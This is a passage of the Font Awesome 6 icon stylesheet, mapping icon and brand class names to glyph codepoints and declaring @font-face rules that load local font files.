"\f338"; } .fa-up-down-left-right::before { content: "\f0b2"; } .fa-arrows-alt::before { content: "\f0b2"; } .fa-up-long::before { content: "\f30c"; } .fa-long-arrow-alt-up::before { content: "\f30c"; } .fa-up-right-and-down-left-from-center::before { content: "\f424"; } .fa-expand-alt::before { content: "\f424"; } .fa-up-right-from-square::before { content: "\f35d"; } .fa-external-link-alt::before { content: "\f35d"; } .fa-upload::before { content: "\f093"; } .fa-user::before { content: "\f007"; } .fa-user-astronaut::before { content: "\f4fb"; } .fa-user-check::before { content: "\f4fc"; } .fa-user-clock::before { content: "\f4fd"; } .fa-user-doctor::before { content: "\f0f0"; } .fa-user-md::before { content: "\f0f0"; } .fa-user-gear::before { content: "\f4fe"; } .fa-user-cog::before { content: "\f4fe"; } .fa-user-graduate::before { content: "\f501"; } .fa-user-group::before { content: "\f500"; } .fa-user-friends::before { content: "\f500"; } .fa-user-injured::before { content: "\f728"; } .fa-user-large::before { content: "\f406"; } .fa-user-alt::before { content: "\f406"; } .fa-user-large-slash::before { content: "\f4fa"; } .fa-user-alt-slash::before { content: "\f4fa"; } .fa-user-lock::before { content: "\f502"; } .fa-user-minus::before { content: "\f503"; } .fa-user-ninja::before { content: "\f504"; } .fa-user-nurse::before { content: "\f82f"; } .fa-user-pen::before { content: "\f4ff"; } .fa-user-edit::before { content: "\f4ff"; } .fa-user-plus::before { content: "\f234"; } .fa-user-secret::before { content: "\f21b"; } .fa-user-shield::before { content: "\f505"; } .fa-user-slash::before { content: "\f506"; } .fa-user-tag::before { content: "\f507"; } .fa-user-tie::before { content: "\f508"; } .fa-user-xmark::before { content: "\f235"; } .fa-user-times::before { content: "\f235"; } .fa-users::before { content: "\f0c0"; } .fa-users-between-lines::before { content: "\e591"; } .fa-users-gear::before { content: "\f509"; } .fa-users-cog::before { content: "\f509"; } .fa-users-line::before { content: "\e592"; } .fa-users-rays::before { content: "\e593"; } .fa-users-rectangle::before { content: "\e594"; } .fa-users-slash::before { content: "\e073"; } .fa-users-viewfinder::before { content: "\e595"; } .fa-utensils::before { content: "\f2e7"; } .fa-cutlery::before { content: "\f2e7"; } .fa-v::before { content: "\56"; } .fa-van-shuttle::before { content: "\f5b6"; } .fa-shuttle-van::before { content: "\f5b6"; } .fa-vault::before { content: "\e2c5"; } .fa-vector-square::before { content: "\f5cb"; } .fa-venus::before { content: "\f221"; } .fa-venus-double::before { content: "\f226"; } .fa-venus-mars::before { content: "\f228"; } .fa-vest::before { content: "\e085"; } .fa-vest-patches::before { content: "\e086"; } .fa-vial::before { content: "\f492"; } .fa-vial-circle-check::before { content: "\e596"; } .fa-vial-virus::before { content: "\e597"; } .fa-vials::before { content: "\f493"; } .fa-video::before { content: "\f03d"; } .fa-video-camera::before { content: "\f03d"; } .fa-video-slash::before { content: "\f4e2"; } .fa-vihara::before { content: "\f6a7"; } .fa-virus::before { content: "\e074"; } .fa-virus-covid::before { content: "\e4a8"; } .fa-virus-covid-slash::before { content: "\e4a9"; } .fa-virus-slash::before { content: "\e075"; } .fa-viruses::before { content: "\e076"; } .fa-voicemail::before { content: "\f897"; } .fa-volcano::before { content: "\f770"; } .fa-volleyball::before { content: "\f45f"; } .fa-volleyball-ball::before { content: "\f45f"; } .fa-volume-high::before { content: "\f028"; } .fa-volume-up::before { content: "\f028"; } .fa-volume-low::before { content: "\f027"; } .fa-volume-down::before { content: "\f027"; } .fa-volume-off::before { content: "\f026"; } .fa-volume-xmark::before { content: "\f6a9"; } .fa-volume-mute::before { content: "\f6a9"; } .fa-volume-times::before { content: "\f6a9"; } .fa-vr-cardboard::before { content: "\f729"; } .fa-w::before { content: "\57"; } .fa-walkie-talkie::before { content: "\f8ef"; } .fa-wallet::before { content: "\f555"; } .fa-wand-magic::before { content: "\f0d0"; } .fa-magic::before { content: "\f0d0"; } .fa-wand-magic-sparkles::before { content: "\e2ca"; } .fa-magic-wand-sparkles::before { content: "\e2ca"; } .fa-wand-sparkles::before { content: "\f72b"; } .fa-warehouse::before { content: "\f494"; } .fa-water::before { content: "\f773"; } .fa-water-ladder::before { content: "\f5c5"; } .fa-ladder-water::before { content: "\f5c5"; } .fa-swimming-pool::before { content: "\f5c5"; } .fa-wave-square::before { content: "\f83e"; } .fa-weight-hanging::before { content: "\f5cd"; } .fa-weight-scale::before { content: "\f496"; } .fa-weight::before { content: "\f496"; } .fa-wheat-awn::before { content: "\e2cd"; } .fa-wheat-alt::before { content: "\e2cd"; } .fa-wheat-awn-circle-exclamation::before { content: "\e598"; } .fa-wheelchair::before { content: "\f193"; } .fa-wheelchair-move::before { content: "\e2ce"; } .fa-wheelchair-alt::before { content: "\e2ce"; } .fa-whiskey-glass::before { content: "\f7a0"; } .fa-glass-whiskey::before { content: "\f7a0"; } .fa-wifi::before { content: "\f1eb"; } .fa-wifi-3::before { content: "\f1eb"; } .fa-wifi-strong::before { content: "\f1eb"; } .fa-wind::before { content: "\f72e"; } .fa-window-maximize::before { content: "\f2d0"; } .fa-window-minimize::before { content: "\f2d1"; } .fa-window-restore::before { content: "\f2d2"; } .fa-wine-bottle::before { content: "\f72f"; } .fa-wine-glass::before { content: "\f4e3"; } .fa-wine-glass-empty::before { content: "\f5ce"; } .fa-wine-glass-alt::before { content: "\f5ce"; } .fa-won-sign::before { content: "\f159"; } .fa-krw::before { content: "\f159"; } .fa-won::before { content: "\f159"; } .fa-worm::before { content: "\e599"; } .fa-wrench::before { content: "\f0ad"; } .fa-x::before { content: "\58"; } .fa-x-ray::before { content: "\f497"; } .fa-xmark::before { content: "\f00d"; } .fa-close::before { content: "\f00d"; } .fa-multiply::before { content: "\f00d"; } .fa-remove::before { content: "\f00d"; } .fa-times::before { content: "\f00d"; } .fa-xmarks-lines::before { content: "\e59a"; } .fa-y::before { content: "\59"; } .fa-yen-sign::before { content: "\f157"; } .fa-cny::before { content: "\f157"; } .fa-jpy::before { content: "\f157"; } .fa-rmb::before { content: "\f157"; } .fa-yen::before { content: "\f157"; } .fa-yin-yang::before { content: "\f6ad"; } .fa-z::before { content: "\5a"; } .sr-only, .fa-sr-only { position: absolute; overflow: hidden; clip: rect(0, 0, 0, 0); width: 1px; height: 1px; margin: -1px; padding: 0; white-space: nowrap; border-width: 0; } .sr-only-focusable:not(:focus), .fa-sr-only-focusable:not(:focus) { position: absolute; overflow: hidden; clip: rect(0, 0, 0, 0); width: 1px; height: 1px; margin: -1px; padding: 0; white-space: nowrap; border-width: 0; } :root, :host { --fa-font-brands: normal 400 1em/1 "Font Awesome 6 Brands"; } @font-face { font-family: 'Font Awesome 6 Brands'; font-style: normal; font-weight: 400; font-display: block; src: url("../fonts/fa-brands-400.woff2") format("woff2"), url("../fonts/fa-brands-400.ttf") format("truetype"); } .fab, .fa-brands { font-family: 'Font Awesome 6 Brands'; font-weight: 400; } .fa-42-group:before { content: "\e080"; } .fa-innosoft:before { content: "\e080"; } .fa-500px:before { content: "\f26e"; } .fa-accessible-icon:before { content: "\f368"; } .fa-accusoft:before { content: "\f369"; } .fa-adn:before { content: "\f170"; } .fa-adversal:before { content: "\f36a"; } .fa-affiliatetheme:before { content: "\f36b"; } .fa-airbnb:before { content: "\f834"; } .fa-algolia:before { content: "\f36c"; } .fa-alipay:before { content: "\f642"; } .fa-amazon:before { content: "\f270"; } .fa-amazon-pay:before { content: "\f42c"; } .fa-amilia:before { content: "\f36d"; } .fa-android:before { content: "\f17b"; } .fa-angellist:before { content: "\f209"; } .fa-angrycreative:before { content: "\f36e"; } .fa-angular:before { content: "\f420"; } .fa-app-store:before { content: "\f36f"; } .fa-app-store-ios:before { content: "\f370"; } .fa-apper:before { content: "\f371"; } .fa-apple:before { content: "\f179"; } .fa-apple-pay:before { content: "\f415"; } .fa-artstation:before { content: "\f77a"; } .fa-asymmetrik:before { content: "\f372"; } .fa-atlassian:before { content: "\f77b"; } .fa-audible:before { content: "\f373"; } .fa-autoprefixer:before { content: "\f41c"; } .fa-avianex:before { content: "\f374"; } .fa-aviato:before { content: "\f421"; } .fa-aws:before { content: "\f375"; } .fa-bandcamp:before { content: "\f2d5"; } .fa-battle-net:before { content: "\f835"; } .fa-behance:before { content: "\f1b4"; } .fa-behance-square:before { content: "\f1b5"; } .fa-bilibili:before { content: "\e3d9"; } .fa-bimobject:before { content: "\f378"; } .fa-bitbucket:before { content: "\f171"; } .fa-bitcoin:before { content: "\f379"; } .fa-bity:before { content: "\f37a"; } .fa-black-tie:before { content: "\f27e"; } .fa-blackberry:before { content: "\f37b"; } .fa-blogger:before { content: "\f37c"; } .fa-blogger-b:before { content: "\f37d"; } .fa-bluetooth:before { content: "\f293"; } .fa-bluetooth-b:before { content: "\f294"; } .fa-bootstrap:before { content: "\f836"; } .fa-bots:before { content: "\e340"; } .fa-btc:before { content: "\f15a"; } .fa-buffer:before { content: "\f837"; } .fa-buromobelexperte:before { content: "\f37f"; } .fa-buy-n-large:before { content: "\f8a6"; } .fa-buysellads:before { content: "\f20d"; } .fa-canadian-maple-leaf:before { content: "\f785"; } .fa-cc-amazon-pay:before { content: "\f42d"; } .fa-cc-amex:before { content: "\f1f3"; } .fa-cc-apple-pay:before { content: "\f416"; } .fa-cc-diners-club:before { content: "\f24c"; } .fa-cc-discover:before { content: "\f1f2"; } .fa-cc-jcb:before { content: "\f24b"; } .fa-cc-mastercard:before { content: "\f1f1"; } .fa-cc-paypal:before { content: "\f1f4"; } .fa-cc-stripe:before { content: "\f1f5"; } .fa-cc-visa:before { content: "\f1f0"; } .fa-centercode:before { content: "\f380"; } .fa-centos:before { content: "\f789"; } .fa-chrome:before { content: "\f268"; } .fa-chromecast:before { content: "\f838"; } .fa-cloudflare:before { content: "\e07d"; } .fa-cloudscale:before { content: "\f383"; } .fa-cloudsmith:before { content: "\f384"; } .fa-cloudversify:before { content: "\f385"; } .fa-cmplid:before { content: "\e360"; } .fa-codepen:before { content: "\f1cb"; } .fa-codiepie:before { content: "\f284"; } .fa-confluence:before { content: "\f78d"; } .fa-connectdevelop:before { content: "\f20e"; } .fa-contao:before { content: "\f26d"; } .fa-cotton-bureau:before { content: "\f89e"; } .fa-cpanel:before { content: "\f388"; } .fa-creative-commons:before { content: "\f25e"; } .fa-creative-commons-by:before { content: "\f4e7"; } .fa-creative-commons-nc:before { content: "\f4e8"; } .fa-creative-commons-nc-eu:before { content: "\f4e9"; } .fa-creative-commons-nc-jp:before { content: "\f4ea"; } .fa-creative-commons-nd:before { content: "\f4eb"; } .fa-creative-commons-pd:before { content: "\f4ec"; } .fa-creative-commons-pd-alt:before { content: "\f4ed"; } .fa-creative-commons-remix:before { content: "\f4ee"; } .fa-creative-commons-sa:before { content: "\f4ef"; } .fa-creative-commons-sampling:before { content: "\f4f0"; } .fa-creative-commons-sampling-plus:before { content: "\f4f1"; } .fa-creative-commons-share:before { content: "\f4f2"; } .fa-creative-commons-zero:before { content: "\f4f3"; } .fa-critical-role:before { content: "\f6c9"; } .fa-css3:before { content: "\f13c"; } .fa-css3-alt:before { content: "\f38b"; } .fa-cuttlefish:before { content: "\f38c"; } .fa-d-and-d:before { content: "\f38d"; } .fa-d-and-d-beyond:before { content: "\f6ca"; } .fa-dailymotion:before { content: "\e052"; } .fa-dashcube:before { content: "\f210"; } .fa-deezer:before { content: "\e077"; } .fa-delicious:before { content: "\f1a5"; } .fa-deploydog:before { content: "\f38e"; } .fa-deskpro:before { content: "\f38f"; } .fa-dev:before { content: "\f6cc"; } .fa-deviantart:before { content: "\f1bd"; } .fa-dhl:before { content: "\f790"; } .fa-diaspora:before { content: "\f791"; } .fa-digg:before { content: "\f1a6"; } .fa-digital-ocean:before { content: "\f391"; } .fa-discord:before { content: "\f392"; } .fa-discourse:before { content: "\f393"; } .fa-dochub:before { content: "\f394"; } .fa-docker:before { content: "\f395"; } .fa-draft2digital:before { content: "\f396"; } .fa-dribbble:before { content: "\f17d"; } .fa-dribbble-square:before { content: "\f397"; } .fa-dropbox:before { content: "\f16b"; } .fa-drupal:before { content: "\f1a9"; } .fa-dyalog:before { content: "\f399"; } .fa-earlybirds:before { content: "\f39a"; } .fa-ebay:before { content: "\f4f4"; } .fa-edge:before { content: "\f282"; } .fa-edge-legacy:before { content: "\e078"; } .fa-elementor:before { content: "\f430"; } .fa-ello:before { content: "\f5f1"; } .fa-ember:before { content: "\f423"; } .fa-empire:before { content: "\f1d1"; } .fa-envira:before { content: "\f299"; } .fa-erlang:before { content: "\f39d"; } .fa-ethereum:before { content: "\f42e"; } .fa-etsy:before { content: "\f2d7"; } .fa-evernote:before { content: "\f839"; } .fa-expeditedssl:before { content: "\f23e"; } .fa-facebook:before { content: "\f09a"; } .fa-facebook-f:before { content: "\f39e"; } .fa-facebook-messenger:before { content: "\f39f"; } .fa-facebook-square:before { content: "\f082"; } .fa-fantasy-flight-games:before { content: "\f6dc"; } .fa-fedex:before { content: "\f797"; } .fa-fedora:before { content: "\f798"; } .fa-figma:before { content: "\f799"; } .fa-firefox:before { content: "\f269"; } .fa-firefox-browser:before { content: "\e007"; } .fa-first-order:before { content: "\f2b0"; } .fa-first-order-alt:before { content: "\f50a"; } .fa-firstdraft:before { content: "\f3a1"; } .fa-flickr:before { content: "\f16e"; } .fa-flipboard:before { content: "\f44d"; } .fa-fly:before { content: "\f417"; } .fa-font-awesome:before { content: "\f2b4"; } .fa-font-awesome-flag:before { content: "\f2b4"; } .fa-font-awesome-logo-full:before { content: "\f2b4"; } .fa-fonticons:before { content: "\f280"; } .fa-fonticons-fi:before { content: "\f3a2"; } .fa-fort-awesome:before { content: "\f286"; } .fa-fort-awesome-alt:before { content: "\f3a3"; } .fa-forumbee:before { content: "\f211"; } .fa-foursquare:before { content: "\f180"; } .fa-free-code-camp:before { content: "\f2c5"; } .fa-freebsd:before { content: "\f3a4"; } .fa-fulcrum:before { content: "\f50b"; } .fa-galactic-republic:before { content: "\f50c"; } .fa-galactic-senate:before { content: "\f50d"; } .fa-get-pocket:before { content: "\f265"; } .fa-gg:before { content: "\f260"; } .fa-gg-circle:before { content: "\f261"; } .fa-git:before { content: "\f1d3"; } .fa-git-alt:before { content: "\f841"; } .fa-git-square:before { content: "\f1d2"; } .fa-github:before { content: "\f09b"; } .fa-github-alt:before { content: "\f113"; } .fa-github-square:before { content: "\f092"; } .fa-gitkraken:before { content: "\f3a6"; } .fa-gitlab:before { content: "\f296"; } .fa-gitter:before { content: "\f426"; } .fa-glide:before { content: "\f2a5"; } .fa-glide-g:before { content: "\f2a6"; } .fa-gofore:before { content: "\f3a7"; } .fa-golang:before { content: "\e40f"; } .fa-goodreads:before { content: "\f3a8"; } .fa-goodreads-g:before { content: "\f3a9"; } .fa-google:before { content: "\f1a0"; } .fa-google-drive:before { content: "\f3aa"; } .fa-google-pay:before { content: "\e079"; } .fa-google-play:before { content: "\f3ab"; } .fa-google-plus:before { content: "\f2b3"; } .fa-google-plus-g:before { content: "\f0d5"; } .fa-google-plus-square:before { content: "\f0d4"; } .fa-google-wallet:before { content: "\f1ee"; } .fa-gratipay:before { content: "\f184"; } .fa-grav:before { content: "\f2d6"; } .fa-gripfire:before { content: "\f3ac"; } .fa-grunt:before { content: "\f3ad"; } .fa-guilded:before { content: "\e07e"; } .fa-gulp:before { content: "\f3ae"; } .fa-hacker-news:before { content: "\f1d4"; } .fa-hacker-news-square:before { content: "\f3af"; } .fa-hackerrank:before { content: "\f5f7"; } .fa-hashnode:before { content: "\e499"; } .fa-hips:before { content: "\f452"; } .fa-hire-a-helper:before { content: "\f3b0"; } .fa-hive:before { content: "\e07f"; } .fa-hooli:before { content: "\f427"; } .fa-hornbill:before { content: "\f592"; } .fa-hotjar:before { content: "\f3b1"; } .fa-houzz:before { content: "\f27c"; } .fa-html5:before { content: "\f13b"; } .fa-hubspot:before { content: "\f3b2"; } .fa-ideal:before { content: "\e013"; } .fa-imdb:before { content: "\f2d8"; } .fa-instagram:before { content: "\f16d"; } .fa-instagram-square:before { content: "\e055"; } .fa-instalod:before { content: "\e081"; } .fa-intercom:before { content: "\f7af"; } .fa-internet-explorer:before { content: "\f26b"; } .fa-invision:before { content: "\f7b0"; } .fa-ioxhost:before { content: "\f208"; } .fa-itch-io:before { content: "\f83a"; } .fa-itunes:before { content: "\f3b4"; } .fa-itunes-note:before { content: "\f3b5"; } .fa-java:before { content: "\f4e4"; } .fa-jedi-order:before { content: "\f50e"; } .fa-jenkins:before { content: "\f3b6"; } .fa-jira:before { content: "\f7b1"; } .fa-joget:before { content: "\f3b7"; } .fa-joomla:before { content: "\f1aa"; } .fa-js:before { content: "\f3b8"; } .fa-js-square:before { content: "\f3b9"; } .fa-jsfiddle:before { content: "\f1cc"; } .fa-kaggle:before { content: "\f5fa"; } .fa-keybase:before { content: "\f4f5"; } .fa-keycdn:before { content: "\f3ba"; } .fa-kickstarter:before { content: "\f3bb"; } .fa-kickstarter-k:before { content: "\f3bc"; } .fa-korvue:before { content: "\f42f"; } .fa-laravel:before { content: "\f3bd"; } .fa-lastfm:before { content: "\f202"; } .fa-lastfm-square:before { content: "\f203"; } .fa-leanpub:before { content: "\f212"; } .fa-less:before { content: "\f41d"; } .fa-line:before { content: "\f3c0"; } .fa-linkedin:before { content: "\f08c"; } .fa-linkedin-in:before { content: "\f0e1"; } .fa-linode:before { content: "\f2b8"; } .fa-linux:before { content: "\f17c"; } .fa-lyft:before { content: "\f3c3"; } .fa-magento:before { content: "\f3c4"; } .fa-mailchimp:before { content: "\f59e"; } .fa-mandalorian:before { content: "\f50f"; } .fa-markdown:before { content: "\f60f"; } .fa-mastodon:before { content: "\f4f6"; } .fa-maxcdn:before { content: "\f136"; } .fa-mdb:before { content: "\f8ca"; } .fa-medapps:before { content: "\f3c6"; } .fa-medium:before { content: "\f23a"; } .fa-medium-m:before { content: "\f23a"; } .fa-medrt:before { content: "\f3c8"; } .fa-meetup:before { content: "\f2e0"; } .fa-megaport:before { content: "\f5a3"; } .fa-mendeley:before { content: "\f7b3"; } .fa-microblog:before { content: "\e01a"; } .fa-microsoft:before { content: "\f3ca"; } .fa-mix:before { content: "\f3cb"; } .fa-mixcloud:before { content: "\f289"; } .fa-mixer:before { content: "\e056"; } .fa-mizuni:before { content: "\f3cc"; } .fa-modx:before { content: "\f285"; } .fa-monero:before { content: "\f3d0"; } .fa-napster:before { content: "\f3d2"; } .fa-neos:before { content: "\f612"; } .fa-nfc-directional:before { content: "\e530"; } .fa-nfc-symbol:before { content: "\e531"; } .fa-nimblr:before { content: "\f5a8"; } .fa-node:before { content: "\f419"; } .fa-node-js:before { content: "\f3d3"; } .fa-npm:before { content: "\f3d4"; } .fa-ns8:before { content: "\f3d5"; } .fa-nutritionix:before { content: "\f3d6"; } .fa-octopus-deploy:before { content: "\e082"; } .fa-odnoklassniki:before { content: "\f263"; } .fa-odnoklassniki-square:before { content: "\f264"; } .fa-old-republic:before { content: "\f510"; } .fa-opencart:before { content: "\f23d"; } .fa-openid:before { content: "\f19b"; } .fa-opera:before { content: "\f26a"; } .fa-optin-monster:before { content: "\f23c"; } .fa-orcid:before { content: "\f8d2"; } .fa-osi:before { content: "\f41a"; } .fa-padlet:before { content: "\e4a0"; } .fa-page4:before { content: "\f3d7"; } .fa-pagelines:before { content: "\f18c"; } .fa-palfed:before { content: "\f3d8"; } .fa-patreon:before { content: "\f3d9"; } .fa-paypal:before { content: "\f1ed"; } .fa-perbyte:before { content: "\e083"; } .fa-periscope:before { content: "\f3da"; } .fa-phabricator:before { content: "\f3db"; } .fa-phoenix-framework:before { content: "\f3dc"; } .fa-phoenix-squadron:before { content: "\f511"; } .fa-php:before { content: "\f457"; } .fa-pied-piper:before { content: "\f2ae"; } .fa-pied-piper-alt:before { content: "\f1a8"; } .fa-pied-piper-hat:before { content: "\f4e5"; } .fa-pied-piper-pp:before { content: "\f1a7"; } .fa-pied-piper-square:before { content: "\e01e"; } .fa-pinterest:before { content: "\f0d2"; } .fa-pinterest-p:before { content: "\f231"; } .fa-pinterest-square:before { content: "\f0d3"; } .fa-pix:before { content: "\e43a"; } .fa-playstation:before { content: "\f3df"; } .fa-product-hunt:before { content: "\f288"; } .fa-pushed:before { content: "\f3e1"; } .fa-python:before { content: "\f3e2"; } .fa-qq:before { content: "\f1d6"; } .fa-quinscape:before { content: "\f459"; } .fa-quora:before { content: "\f2c4"; } .fa-r-project:before { content: "\f4f7"; } .fa-raspberry-pi:before { content: "\f7bb"; } .fa-ravelry:before { content: "\f2d9"; } .fa-react:before { content: "\f41b"; } .fa-reacteurope:before { content: "\f75d"; } .fa-readme:before { content: "\f4d5"; } .fa-rebel:before { content: "\f1d0"; } .fa-red-river:before { content: "\f3e3"; } .fa-reddit:before { content: "\f1a1"; } .fa-reddit-alien:before { content: "\f281"; } .fa-reddit-square:before { content: "\f1a2"; } .fa-redhat:before { content: "\f7bc"; } .fa-renren:before { content: "\f18b"; } .fa-replyd:before { content: "\f3e6"; } .fa-researchgate:before { content: "\f4f8"; } .fa-resolving:before { content: "\f3e7"; } .fa-rev:before { content: "\f5b2"; } .fa-rocketchat:before { content: "\f3e8"; } .fa-rockrms:before { content: "\f3e9"; } .fa-rust:before { content: "\e07a"; } .fa-safari:before { content: "\f267"; } .fa-salesforce:before { content: "\f83b"; } .fa-sass:before { content: "\f41e"; } .fa-schlix:before { content: "\f3ea"; } .fa-screenpal:before { content: "\e570"; } .fa-scribd:before { content: "\f28a"; } .fa-searchengin:before { content: "\f3eb"; } .fa-sellcast:before { content: "\f2da"; } .fa-sellsy:before { content: "\f213"; } .fa-servicestack:before { content: "\f3ec"; } .fa-shirtsinbulk:before { content: "\f214"; } .fa-shopify:before { content: "\e057"; } .fa-shopware:before { content: "\f5b5"; } .fa-simplybuilt:before { content: "\f215"; } .fa-sistrix:before { content: "\f3ee"; } .fa-sith:before { content: "\f512"; } .fa-sitrox:before { content: "\e44a"; } .fa-sketch:before { content: "\f7c6"; } .fa-skyatlas:before { content: "\f216"; } .fa-skype:before { content: "\f17e"; } .fa-slack:before { content: "\f198"; } .fa-slack-hash:before { content: "\f198"; } .fa-slideshare:before { content: "\f1e7"; } .fa-snapchat:before { content: "\f2ab"; } .fa-snapchat-ghost:before { content: "\f2ab"; } .fa-snapchat-square:before { content: "\f2ad"; } .fa-soundcloud:before { content: "\f1be"; } .fa-sourcetree:before { content: "\f7d3"; } .fa-speakap:before { content: "\f3f3"; } .fa-speaker-deck:before { content: "\f83c"; } .fa-spotify:before { content: "\f1bc"; } .fa-square-font-awesome:before { content: "\f425"; } .fa-square-font-awesome-stroke:before { content: "\f35c"; } .fa-font-awesome-alt:before { content: "\f35c"; } .fa-squarespace:before { content: "\f5be"; } .fa-stack-exchange:before { content: "\f18d"; } .fa-stack-overflow:before { content: "\f16c"; } .fa-stackpath:before { content: "\f842"; } .fa-staylinked:before { content: "\f3f5"; } .fa-steam:before { content: "\f1b6"; } .fa-steam-square:before { content: "\f1b7"; } .fa-steam-symbol:before { content: "\f3f6"; } .fa-sticker-mule:before { content: "\f3f7"; } .fa-strava:before { content: "\f428"; } .fa-stripe:before { content: "\f429"; } .fa-stripe-s:before { content: "\f42a"; } .fa-studiovinari:before { content: "\f3f8"; } .fa-stumbleupon:before { content: "\f1a4"; } .fa-stumbleupon-circle:before { content: "\f1a3"; } .fa-superpowers:before { content: "\f2dd"; } .fa-supple:before { content: "\f3f9"; } .fa-suse:before { content: "\f7d6"; } .fa-swift:before { content: "\f8e1"; } .fa-symfony:before { content: "\f83d"; } .fa-teamspeak:before { content: "\f4f9"; } .fa-telegram:before { content: "\f2c6"; } .fa-telegram-plane:before { content: "\f2c6"; } .fa-tencent-weibo:before { content: "\f1d5"; } .fa-the-red-yeti:before { content: "\f69d"; } .fa-themeco:before { content: "\f5c6"; } .fa-themeisle:before { content: "\f2b2"; } .fa-think-peaks:before { content: "\f731"; } .fa-tiktok:before { content: "\e07b"; } .fa-trade-federation:before { content: "\f513"; } .fa-trello:before { content: "\f181"; } .fa-tumblr:before { content: "\f173"; } .fa-tumblr-square:before { content: "\f174"; } .fa-twitch:before { content: "\f1e8"; } .fa-twitter:before { content: "\f099"; } .fa-twitter-square:before { content: "\f081"; } .fa-typo3:before { content: "\f42b"; } .fa-uber:before { content: "\f402"; } .fa-ubuntu:before { content: "\f7df"; } .fa-uikit:before { content: "\f403"; } .fa-umbraco:before { content: "\f8e8"; } .fa-uncharted:before { content: "\e084"; } .fa-uniregistry:before { content: "\f404"; } .fa-unity:before { content: "\e049"; } .fa-unsplash:before { content: "\e07c"; } .fa-untappd:before { content: "\f405"; } .fa-ups:before { content: "\f7e0"; } .fa-usb:before { content: "\f287"; } .fa-usps:before { content: "\f7e1"; } .fa-ussunnah:before { content: "\f407"; } .fa-vaadin:before { content: "\f408"; } .fa-viacoin:before { content: "\f237"; } .fa-viadeo:before { content: "\f2a9"; } .fa-viadeo-square:before { content: "\f2aa"; } .fa-viber:before { content: "\f409"; } .fa-vimeo:before { content: "\f40a"; } .fa-vimeo-square:before { content: "\f194"; } .fa-vimeo-v:before { content: "\f27d"; } .fa-vine:before { content: "\f1ca"; } .fa-vk:before { content: "\f189"; } .fa-vnv:before { content: "\f40b"; } .fa-vuejs:before { content: "\f41f"; } .fa-watchman-monitoring:before { content: "\e087"; } .fa-waze:before { content: "\f83f"; } .fa-weebly:before { content: "\f5cc"; } .fa-weibo:before { content: "\f18a"; } .fa-weixin:before { content: "\f1d7"; } .fa-whatsapp:before { content: "\f232"; } .fa-whatsapp-square:before { content: "\f40c"; } .fa-whmcs:before { content: "\f40d"; } .fa-wikipedia-w:before { content: "\f266"; } .fa-windows:before { content: "\f17a"; } .fa-wirsindhandwerk:before { content: "\e2d0"; } .fa-wsh:before { content: "\e2d0"; } .fa-wix:before { content: "\f5cf"; } .fa-wizards-of-the-coast:before { content: "\f730"; } .fa-wodu:before { content: "\e088"; } .fa-wolf-pack-battalion:before { content: "\f514"; } .fa-wordpress:before { content: "\f19a"; } .fa-wordpress-simple:before { content: "\f411"; } .fa-wpbeginner:before { content: "\f297"; } .fa-wpexplorer:before { content: "\f2de"; } .fa-wpforms:before { content: "\f298"; } .fa-wpressr:before { content: "\f3e4"; } .fa-xbox:before { content: "\f412"; } .fa-xing:before { content: "\f168"; } .fa-xing-square:before { content: "\f169"; } .fa-y-combinator:before { content: "\f23b"; } .fa-yahoo:before { content: "\f19e"; } .fa-yammer:before { content: "\f840"; } .fa-yandex:before { content: "\f413"; } .fa-yandex-international:before { content: "\f414"; } .fa-yarn:before { content: "\f7e3"; } .fa-yelp:before { content: "\f1e9"; } .fa-yoast:before { content: "\f2b1"; } .fa-youtube:before { content: "\f167"; } .fa-youtube-square:before { content: "\f431"; } .fa-zhihu:before { content: "\f63f"; } :root, :host { --fa-font-regular: normal 400 1em/1 "Font Awesome 6 Free"; } @font-face { font-family: 'Font Awesome 6 Free'; font-style: normal; font-weight: 400; font-display: block; src: url("../fonts/fa-regular-400.woff2") format("woff2"), url("../fonts/fa-regular-400.ttf") format("truetype"); } .far, .fa-regular { font-family: 'Font Awesome 6 Free'; font-weight: 400; } :root, :host { --fa-font-solid: normal 900 1em/1 "Font Awesome 6 Free"; } @font-face { font-family: 'Font Awesome 6 Free'; font-style: normal; font-weight: 900; font-display: block; src: url("../fonts/fa-solid-900.woff2") format("woff2"), url("../fonts/fa-solid-900.ttf") format("truetype"); } .fas, .fa-solid { font-family: 'Font Awesome 6 Free'; font-weight: 900; } @font-face { font-family: "Font Awesome 5 Brands"; font-display: block; font-weight: 400; src: url("../fonts/fa-brands-400.woff2") format("woff2"), url("../fonts/fa-brands-400.ttf") format("truetype"); } @font-face { font-family: "Font Awesome 5 Free"; font-display: block; font-weight: 900; src: url("../fonts/fa-solid-900.woff2") format("woff2"), url("../fonts/fa-solid-900.ttf") format("truetype"); } @font-face { font-family: "Font Awesome 5 Free"; font-display: block; font-weight: 400; src: url("../fonts/fa-regular-400.woff2") format("woff2"), url("../fonts/fa-regular-400.ttf") format("truetype"); } @font-face { font-family: "FontAwesome"; font-display: block; src: url("../fonts/fa-solid-900.woff2") format("woff2"), url("../fonts/fa-solid-900.ttf") format("truetype"); } @font-face { font-family: "FontAwesome"; font-display: block; src: url("../fonts/fa-brands-400.woff2") format("woff2"), url("../fonts/fa-brands-400.ttf") format("truetype"); } @font-face { font-family: "FontAwesome"; font-display: block; src: url("../fonts/fa-regular-400.woff2") format("woff2"), url("../fonts/fa-regular-400.ttf") format("truetype"); unicode-range: U+F003, U+F006, U+F014, U+F016-F017, U+F01A-F01B, U+F01D, U+F022, U+F03E, U+F044, U+F046, U+F05C-F05D, U+F06E, U+F070, U+F087-F088, U+F08A, U+F094, U+F096-F097, U+F09D, U+F0A0, U+F0A2, U+F0A4-F0A7, U+F0C5, U+F0C7, U+F0E5-F0E6, U+F0EB, U+F0F6-F0F8, U+F10C, U+F114-F115, U+F118-F11A, U+F11C-F11D, U+F133, U+F147, U+F14E, U+F150-F152, U+F185-F186, U+F18E, U+F190-F192, U+F196, U+F1C1-F1C9, U+F1D9, U+F1DB, U+F1E3, U+F1EA, U+F1F7, U+F1F9, U+F20A, U+F247-F248, U+F24A, U+F24D, U+F255-F25B, U+F25D, U+F271-F274, U+F278, U+F27B, U+F28C, U+F28E, U+F29C, U+F2B5, U+F2B7, U+F2BA, U+F2BC, U+F2BE, U+F2C0-F2C1, U+F2C3, U+F2D0, U+F2D2, U+F2D4, U+F2DC; } @font-face { font-family: "FontAwesome"; font-display: block; src: url("../fonts/fa-v4compatibility.woff2") format("woff2"), url("../fonts/fa-v4compatibility.ttf") format("truetype"); unicode-range: U+F041, U+F047, U+F065-F066, U+F07D-F07E, U+F080, U+F08B, U+F08E, U+F090, U+F09A, U+F0AC, U+F0AE, U+F0B2, U+F0D0, U+F0D6, U+F0E4, U+F0EC, 